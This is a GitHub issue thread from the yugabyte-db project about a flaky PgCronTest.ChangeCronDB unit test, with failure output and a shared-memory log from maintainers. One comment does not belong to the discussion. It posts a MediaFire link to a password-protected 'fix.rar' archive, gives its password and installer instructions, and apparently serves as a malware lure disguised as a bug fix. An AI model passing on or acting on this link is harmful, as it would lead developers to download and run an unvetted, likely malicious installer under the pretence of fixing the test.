### ISSUE TITLE
[DocDB] PgCronTest.ChangeCronDB- Unit test failure

### ISSUE THREAD

**Issue by shishir2001-yb** [yugabyte/yugabyte-db#23655]
Jira Link: [DB-12566](https://yugabyte.atlassian.net/browse/DB-12566)
### Description

This looks like a test issue.
**_PgCronTest.ChangeCronDB_**: 
[Analyze Trends](https://detective.dev.yugabyte.com/stability/test?analyze_trends=true&branch=master&build_type=all&class=PgCronTest&fail_tag=all&name=ChangeCronDB&platform=linux)

```
../../src/yb/integration-tests/pg_cron-test.cc:371
Expected: (new_db_row_count1) > (0), actual: 0 vs 0
 ../../src/yb/integration-tests/pg_cron-test.cc:360 Failed Bad status: Network error (yb/yql/pgwrapper/libpq_utils.cc:367): Connect failed: could not connect to server: Connection refused  Is the server running on host "127.182.106.2" and accepting  TCP/IP connections on port 23114?, passed: 60.001s: could not connect to server: Connection refused  Is the server running on host "127.182.106.2" and accepting  TCP/IP connections on port 23114? (aux msg could not connect to server: Connection refused  Is the server running on host "127.182.106.2" and accepting  TCP/IP connections on port 23114?)
 ```

### Issue Type

kind/bug

### Warning: Please confirm that this issue does not contain any sensitive information

- [X] I confirm this issue does not contain any sensitive information.

[DB-12566]: https://yugabyte.atlassian.net/browse/DB-12566?atlOrigin=eyJpIjoiNWRkNTljNzYxNjVmNDY3MDlhMDU5Y2ZhYzA5YTRkZjUiLCJwIjoiZ2l0aHViLWNvbS1KU1cifQ

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by hari90** [comment]
```
[ts-3] 2024-08-26 23:22:12.010 UTC [271594] FATAL:  pre-existing shared memory block (key 19929001, ID 491531) is still in use
[ts-3] 2024-08-26 23:22:12.010 UTC [271594] HINT:  Terminate any old server processes associated with data directory "${TEST_TMPDIR}/pg_cron-test.PgCronTest.ChangeCronDB.1724713901472956-268070/minicluster-data/ts-3/pg_data".
```
